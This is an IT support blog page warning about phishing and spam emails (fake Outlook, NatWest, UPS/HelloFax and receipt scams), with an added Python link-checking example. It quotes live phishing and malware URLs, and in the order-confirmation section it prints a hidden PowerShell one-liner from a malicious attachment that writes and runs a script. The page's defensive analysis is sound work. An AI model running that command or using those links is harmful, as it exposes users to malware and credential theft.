sircles.net Computer Support The sircles IT support & solutions blog | Viruses and Malware threats

The sircles IT support & solutions blog Internet Safety & Security, Windows Tweaks and Server Fixes

Security alert for your linked account #28868 - Fake outlook.com account recovery messages


Watch out for these fake account recovery messages as they are finding their way into outlook.com and hotmail.com!
Your profile is listed as the recovery email for recipient@hotmail.com. Don't recognize this profile? click here.

Sign-in attempt was blocked for your linked account
recipient@hotmail.com

Someone just used your password to try to sign in to your profile.

You received this email to let you know about important changes to your profile and services.

© 2018 1600 Amphitheatre Parkway, Mountain View, CA 94043, USA

Both the 'check activity' link and the 'click here' link under 'Don't recognize this profile?' actually point to: http://wiki.1rwn.com/ctireaz/radiantlyb.html

The link is not dangerous - it just forwards you to a Canadian Pharmacy page - but do report the originator of the email and the website as neither will be very nice people.
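
Both links in that message go to the same host that has nothing to do with Microsoft, and that mismatch between the brand a message claims and where its links really point is the quickest machine check for this kind of mail. Below is an added example in Python (not code from the original post) that parses an HTML body, collects every anchor and flags those whose destination lies outside the hosts the claimed brand would use. The message body is constructed to resemble the alert above, the link target is the one quoted in the post, and the list of expected hosts is an assumption made for the example.

```python
"""Flag links in an HTML e-mail whose destination does not match the brand the
message claims to come from. Added example; the sample message below is
constructed to resemble the fake outlook.com recovery alert."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts a genuine Microsoft account message would link to. This list is an
# assumption for the example; a real filter keeps one list per sender brand.
EXPECTED_HOSTS = {"microsoft.com", "live.com", "outlook.com", "hotmail.com"}


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element in the body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable_domain(host):
    """Crude registrable domain: the last two labels (no public-suffix list)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def suspicious_links(html, expected_hosts=EXPECTED_HOSTS):
    """Return (href, text, reason) for every link pointing outside the expected hosts."""
    parser = LinkCollector()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        parsed = urlparse(href)
        host = parsed.hostname or ""
        if parsed.scheme not in ("http", "https"):
            findings.append((href, text, "non-web scheme"))
        elif registrable_domain(host) not in expected_hosts:
            findings.append((href, text, f"links to {host}"))
    return findings


# Constructed sample body (not the original spam HTML); link target from the post.
SAMPLE = """
<p>Your profile is listed as the recovery email for recipient@hotmail.com.
Don't recognize this profile? <a href="http://wiki.1rwn.com/ctireaz/radiantlyb.html">click here</a>.</p>
<p>Someone just used your password to try to sign in to your profile.
<a href="http://wiki.1rwn.com/ctireaz/radiantlyb.html">Check activity</a></p>
<p><a href="https://account.microsoft.com/privacy">Privacy statement</a></p>
"""

if __name__ == "__main__":
    for href, text, reason in suspicious_links(SAMPLE):
        print(f"[{reason}] '{text}' -> {href}")
```

The host check uses the last two labels of the hostname as a stand-in for the registrable domain, so country-code suffixes such as .co.uk need a proper public-suffix list before this is used on real traffic; the two 1rwn.com links above are flagged and the genuine microsoft.com one is not.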

Your Email Domain Account Notification!! Spam

11. October 2018 16:45 by sirclesadmin in Viruses and Malware threats, SPAM, Phishing

This email has been doing the rounds today:

From: YourEmailDomain.com [no-reply@mailserver.com]
Sent: 11 October 2018 02:01
To: Recipient
Subject: YourEmailDomain.com Account Notification!!

Email Security info

Your email name@domain.com has reached an upgrade stage, verify your user email to continue usage,

This is for your own safety to continue using your account, click the button below.

Verify

Note: Please do not ignore this email to avoid your account closure
Thanks,
The security email team.

Copyright © 2018 Mail! Inc. (Co. Reg. No. 2344507D) All Rights Reserved. Intellectual Property

The 'Verify' link actually points to: https://caravanecafe.ca/mikoko/Qupdate/index.php?email=name@domain.com&browser=unkonown&time=valid which has already been marked as deceptive by the major browsers:

The website itself:

Is fairly convincing looking and I will type them a nice message in the password field commending them on their good work and encouraging them to continue.

The password actually appears to do a lookup of some kind as it reports that it is wrong but perhaps they just want to get as many of your passwords as possible...?

Anyway, stay vigilant and safe!

Spam Warning: Notice from UPS


This is a bit of a confusing one as they do not seem to know who they are, HelloFax or UPS.

Here is the message:

From: UPS Choice <ups@altoedge.com>
Sent: Wednesday, August 15, 2018 7:31 PM
To: Recipient
Subject: Notice from UPS

HelloFax

The best way to sign and send faxes online

Dear Customer,

You have received a HelloFax

Date/Time: 08/14/2018 09:55 AM
Number of pages: 4

Reference ID Number: TGH757358L.


We appreciate you going paper-less!
- The HelloFax Community

 

We believe the office can be paper less!
HelloFax Send Docs On-line
HelloSign Sign your Documents Online
HelloSign for Gmail Sign from Googlemail

503 Howard Street, Suite 341
San Francisco, CA

Add us to the list of contacts

The 'Download Fax Now' button actually points at: http://exumabonefishlodge.com?4eHJe=QIUBNYQASHUBQYUDP which already appears to have been shut down, as Chrome just shows:

This site can’t be reached

exumabonefishlodge.com’s server IP address could not be found.

ERR_NAME_NOT_RESOLVED

So no immediate danger here, but this email will be circulating with a hundred different links on it, so beware! Report it as spam and report the link to your browser provider.
One last point is that the 'add us to the contacts list' is actually a link to: https://dyn550zzd47ox.cloudfront.net/1.52.0/css/images/email/support.vcf

And although this is probably the genuine HelloFax shortcut, it actually downloads a .vcf contact file to your PC from CloudFront (cloudfront.net)...

Spam Warning: Your Name, Pack(4M0A_8141) confirmed: 5 items sent


This email has been spotted this week:

From: lou_weihe@clarityconfidenceandcash.com
Sent: Monday, July 30, 2018 10:52 PM
To: Recipient
Subject: Your, Name Pack(4M0A_8141) confirmed: 5 items sent

Your order confirmation. Hi Simon, Great news! Your order is now confirmed. We will email you again when your items ship.

 

WOMEN

MEN

ACCESSORIES

HOME DECOR

GADGETS


Hi Your Name,

Great news! Your order is now confirmed. We will email you again when your items ship.

Thanks for shopping with us!

Order ID: 4M0A_8141

Shipping Address:

Your Name
Your Phone Your Postcode 

View Order


This email was sent from a notification-only address that cannot accept incoming emails.
Please do not reply to this message. If you have any questions or concerns, please contact us

The link in the email downloads a file: 4M0A_8141-order-Receipt.zip

Zip files are not often used for order confirmations anyway, but the hosting website, https://johanwolf.com, obviously has a valid certificate and is being misused by someone. The website itself just seems to forward to Office 365 support for some reason???
If you unzip the file that is provided you see an image:

Which presumably pretends to be a real company.

And a file which runs a script:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -executionpolicy bypass -win hidDEN  -comman cd %USERPROFILE%\Documents; findstr /s bremodilu ..\*.lnk > file.ps1;.\file.ps1;exit

Which will make serious changes to your system. Looking at this we are not sure it would work but might try it on an old PC ..?

We will let you know.

Anyway, report the sender and the website and keep vigilant!
 
 

About a internship! Fake Resume or CV SPAM!


Microsoft Office documents are a dangerous source of macros and other types of malware. Typically a dangerous document is disabled (opened read-only) by later versions of Microsoft Office in order to protect the user, and as a result the modern spam malware Office documents carry a front page explaining that they need to be unlocked.

Let's have a quick look at one:

Here is a message containing a resume we have received today...

Hello there! I hope you are well!

I am absolutely interested in a internship.
Find my attached resume and reply ASAP.

The password for the file is 123123

Looking forward to hearing back from you!
Dayna

If we double-click the attachment containing 'Danya's Resume' we see the password request in Microsoft Word 2016.

We enter the password provided and then...

The text in the document pane has actually been added by the spammers. That 'Was this information helpful?' text is just an image captured from the Microsoft website, just as we have captured this image from the spammers. The 'Yes' and 'No' buttons are not live; they are just there to persuade you that this is a Microsoft message. The text is there to persuade you to enable the macros in this document, but definitely do not.

The only true Microsoft advice here is in yellow at the top, where you are told 'Be careful-email attachments can contain viruses. Unless you need to edit, it's safer to stay in protected view.', and it is. We would suggest that unless you are awaiting the document and it is from the person you are expecting it to be from, never enable a Microsoft Office document for editing.

Let us make sure that this document is not one we are expecting - if we click on the File menu in Microsoft Word and select the Info option we can see the below:

As we can see from the details, this document is nonsense and is not from anyone we know or want to know.

Label these as spam and report the originator to your email administrator or provider.

We have seen the following alternate subjects for the same email:

  1. About a career?
  2. Concerning a internship.
  3. Regarding a career!
  4. Regarding a job?

Mac Detox Software - is it a good thing?

22. May 2018 13:09 by sirclesadmin in Viruses and Malware threats

If you are a Mac user then you will find your computer slowing down just like anyone else's. There is a finite amount of processing power, RAM space and disk throughput that will eventually be maxed out by the software you are running.

The Mac does not have a registry like Windows where the system needs all sorts of details to reference what processes are running and so it is not difficult to remove unwanted start-up programs.

There is a great article on what to do here: https://www.macworld.com/article/2047747/take-control-of-startup-and-login-items.html

Mac detox software - even if it is free - comes at a cost: whether it is corrupting your browser search results or just recording your activity, you do not need proprietary software to clean a Mac.

We have been seeing a lot of sircles blog spam recently trying to add forwards and links to various Mac clean-up sites and we do not recommend using any. Stick to the trusted sites for information, such as MacWorld, and keep your Mac clean of software that may cause more problems than your computer just being slow.

Natwest Spam: Incomplete Security Information


You may receive the following message, purporting to be from Natwest:

From: NatWest <info@ipconnect.de>
Sent: Date
To: Recipient
Subject: Incomplete Security Information

Incomplete Security Information

Hello,

Information we use to determine the security of your account is missing we need you to confirm as soon as possible.

Details:
You are required to review and update missing information*

We have temporarily suspended your online access to prevent any loss to your balance until you securely submit missing information: Click below to continue

RESTORE MY ACCOUNT

Thank You,
The NatWest Accounts team

*The location is approximate and determined by the IP address it was coming from.

This email can't receive replies. For more information, visit the NatWest Accounts Help Center.

You received this mandatory email service announcement to update you about important changes to your NatWest product or account.

© 2018 NatWest Inc.,

The link in the message tries to take you to: http://www.betonruettler.at/statistik/nwolb/index.php

Please mark as spam - the website appears to have already been fixed and the bad content removed... :)

Disability Action Alliance - DAA Receipt#


From: invoice@culqi.net on behalf of Disability Action Alliance – DAA <invoice@culqi.net>
Sent: Date
To: Recipient
Subject: Receipt # 8453985   Receipt # 9599113

Payment Receipt

YOUR PAYMENT HAS BEEN PROCESSED

Your payment has been received, please find attached your PDF invoice.

Spam: Receipt # 255247


Beware of these fake receipts:

Payment Receipt

YOUR PAYMENT HAS BEEN PROCESSED

We send Google.Docs document.

Link points to: https://www.ethereumpower.io/itr_inv_doc.zip

Which obviously downloads a zip file (itr_inv_doc.zip) to corrupt your computer or add a rootkit etc.

We have reported the Google link and the website as well as marking the email as spam - please do the same if you receive one of these.
